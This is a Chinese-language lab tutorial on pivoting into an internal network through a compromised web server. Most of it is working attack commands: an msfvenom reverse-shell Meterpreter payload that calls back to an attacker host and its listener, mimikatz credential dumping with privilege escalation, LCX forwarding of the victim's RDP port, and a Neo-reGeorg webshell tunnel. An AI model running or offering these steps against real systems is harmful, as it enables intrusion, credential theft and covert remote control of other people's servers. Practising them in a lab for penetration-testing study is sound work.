内网隧道与代理
首先使用虚拟机搭建攻击环境
三台电脑:
一台攻击机 外网
一台被攻击的机器(WEB服务器+内网环境)两块网卡,外网+内网
一台KALI 外网 与攻击机处于同一网段
------------------------------------------------------------------
进入攻击的两种方法:
一是使用蚁剑
二是使用MSF
先来讲第一种方法,向攻击中的网站服务器上传一句话木马,然后使用蚁剑连接到这个一句话木马上。
使用MSF生成SU.EXE木马。
使用蚁剑将SU.EXE上传到被攻击的服务器上。
---------------
如果使用MSF,则在KALI中执行如下代码:
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.11 lport=4444 -f exe >su.exe
--在KALI本机上生成反向连接,反向连接到本机IP 端口4444上,的木马su.exe
msfconsole
--启动MSF
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
--设置PAYLOAD
set lhost 10.0.0.11
set lport 4444
--设置反向连接的IP和端口,然后启动连接。
run
启动后,只要被攻击的服务品上SU.EXE木马执行,那么在MSF中将会连接。
在MSF中执行以下命令:
oad mimikatz 加载mimikatz工具
getsystem 提权
getuid 查看权限
creds_all 一键抓取凭证
--creds_all获取到 被攻击服务器密码
然后使用LCX代理转发工具,将选程连接到被攻击的服务器上。
首选使用蚁剑上传LCX到被攻击服务器上和攻击机上
LCX:纯端口转发
尝试转发目标主机3389端口
1、开启3389服务 (打开的是远程桌面连接端口)
2、攻击机执行:
lcx.exe -listen 2222 1234
#监听本地的2222端口将流量转发到1234
3、
Webshell上执行:
lcx.exe -slave 10.0.0.1 2222 127.0.0.1 3389
#将本机3389端口流量转 发到公网ip的2222端口上去
在攻击上执行MSTSC,127.0.0.1:1234 则进入到选程桌面,可连接被攻击的服务器。
至此,LCX纯端口转发的实验已完成。
----------------------------------------------------
reGeorg+Proxifier 打通内网
1、开启2003的IISweb服务
2、生成并上传php后门
python neoreg.py generate -k 111
3、配置代理
开启proxifier,代理服务器127.0.0.1:1080
4、neoreg添加隧道
python neoreg.py -k 111 -u http://10.0.0.129:90/pikachu/tunnel.php
(额外添加python代理规则)
